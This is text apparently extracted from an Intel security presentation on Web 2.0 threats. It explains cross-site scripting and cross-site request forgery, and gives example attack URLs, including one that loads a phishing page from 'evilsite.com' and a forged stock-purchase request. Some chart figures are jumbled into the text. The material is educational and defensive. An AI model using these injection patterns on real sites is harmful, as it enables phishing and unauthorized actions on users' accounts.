Web 2.0 Security Threats- What you need to know

Web 2.0 Security ThreatsWhat you need to know Steve Orrin Dir of Security Solutions, SSG-SPI Intel Corp. Increasing Risks Time-to-Market Complexity is Growing Reported Vulnerabilities & Incidents Vulnerabilities Reported Incidents Reported • • • • • • Mixed Bag of Standards Interoperability, reuse, etc. Continued Rise in malicious activity Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc..) Liability precedents for security incidents Many of the attacks occur at the 9,000 8,000 7,000 6,000 5,000 400,000 350,000 300,000 250,000 200,000 Increasing Business Risks 4,000 3,000 2,000 1,000 0 2000 Source: CERT & CSI/FBI Survey 150,000 100,000 50,000 0 2001 2002 2003 2004 2005 2006 The New Frontier Application/Service layers Threats to Web 2.0 Applications & Environments •The Building Blocks – XSS – Cross Site Scripting • Demo – Dynamic Images • Examples – CSRF – Cross Site Request Forgery • Walk through Demo •The New New Threats • AJAX Vulnerabilities – Information Leakage – Repudiation (CSRF) and XSS – Bridging • • • XDS - Cross Domain Scripts: External Download + Local Execution – Demo XSS Worms – Sammy, QT/MySpace RSS based Threats Cross Site Scripting – Quick Review First Reported: • • • • Early 2000 The user provides unexpected data in a request that is echoed to the user as part of the response. The unexpected data contains a script that is executed in the context of the user‟s browser session. User input is used to build/customize/personalize the response. The application does not anticipate the data will be executed in the user‟s browser context. “Virtual hijacking” of the session. Any information flowing between the legitimate user and site can be manipulated or transmitted to a 3rd party. What is it? Why does Cross Site Scripting happen? Result • • • Hook for phishing and Identity Theft Cross Site Scripting Cross-site scripting attacks (commonly referred to as CSS or XSS) make use of custom URL or code injection into a valid web-based application URL or imbedded data field. In general, these XSS techniques are the result of poor web-application development processes. Examples: • Full HTML substitution such as: – http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm http://mybank.com/ebanking?page=1&client="> Source: Michael Schrenk (mike@schrenk.com) & Steve Orrin (steve.orrin@intel.com) CSRF What is Cross Site Request Forgery? •Cross Site Request Forgery is a style of attack that lets an attacker send arbitrary HTTP requests from a victim user. •Websites allowing a user to perform tasks allow these tasks to take place by sending a specific URL: – Example: http://site/stocks?buy=1000&stock=ebay •If a user is logged into the site and an attacker tricks their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. •Typically you'll use XSS to embed an IMG tag or other HTML/JavaScript code to request a specific 'task url' and if the user is logged in it will get executed without their knowledge. •These sorts of attacks are fairly difficult to detect potentially leaving a user debating with the website/company as to whether or not the stocks bought the day before we initiated by the user after the price plummeted. Source: Chris Shiflett, principal of OmniTI (http://shiflett.org/) CSRF in Action Typical Web Site Code

Here is my sample image:

Attack Code

Here is my sample image:

Source: Chris Shiflett, principal of OmniTI (http://shiflett.org/) CSRF - Demo •Normal Stock trade •Image Source vulnerability for CSRF attack Source: Erik Johnson & Steve Orrin, Intel, Corp. CSRF - Demo CSRF - Demo